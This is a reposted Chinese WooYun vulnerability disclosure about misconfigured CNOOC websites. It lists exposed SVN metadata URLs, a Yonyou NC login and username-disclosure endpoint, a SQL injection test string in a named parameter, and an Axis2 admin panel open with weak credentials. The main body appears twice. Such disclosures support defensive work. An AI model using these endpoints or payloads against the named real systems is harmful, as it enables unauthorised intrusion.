神刀安全网

漏洞标题: 中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

漏洞详情

披露状态:

2016-03-13: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

三处svn泄露

code 区域
https://buy.cnooc.com.cn/cbjywebframe/.svn/entries
https://buy.cnooc.com.cn/cbjyweb/.svn/entries
https://buy.cnooc.com.cn/cbjylogin/.svn/entries

漏洞标题:  中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

这里是用友nc系统后台:http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction

通过用友用户名泄露的漏洞得到用户名:http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=

漏洞标题:  中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

————————————-

WooYun: 用友NC-IUFO报表系统SQL注入(无需登录通杀所有版本) 这个案例来sql注入

站点:http://zhaopin.cnooc.com.cn

code 区域
http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute

简单检测

漏洞标题:  中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

' or 1=1–和' or 1=2–返回不一样

漏洞标题:  中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

code 区域
TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=' or 1=1--

axis2弱口令进入admin axis2

code 区域
http://cctv.cnooc.com.cn/axis2-admin

漏洞标题:  中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

漏洞证明:

三处svn泄露

code 区域
https://buy.cnooc.com.cn/cbjywebframe/.svn/entries
https://buy.cnooc.com.cn/cbjyweb/.svn/entries
https://buy.cnooc.com.cn/cbjylogin/.svn/entries

漏洞标题:  中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

这里是用友nc系统后台:http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction

通过用友用户名泄露的漏洞得到用户名:http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=

漏洞标题:  中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

————————————-

WooYun: 用友NC-IUFO报表系统SQL注入(无需登录通杀所有版本) 这个案例来sql注入

站点:http://zhaopin.cnooc.com.cn

code 区域
http://zhaopin.cnooc.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute

简单检测

漏洞标题:  中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

' or 1=1–和' or 1=2–返回不一样

漏洞标题:  中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

code 区域
TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=' or 1=1--

axis2弱口令进入admin axis2

code 区域
http://cctv.cnooc.com.cn/axis2-admin

漏洞标题:  中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

修复方案:

删除

版权声明:转载请注明来源 黑色键盘丶@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 中国海洋石油总公司多站配置不当(存在Axis2弱口/svn/越权等)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮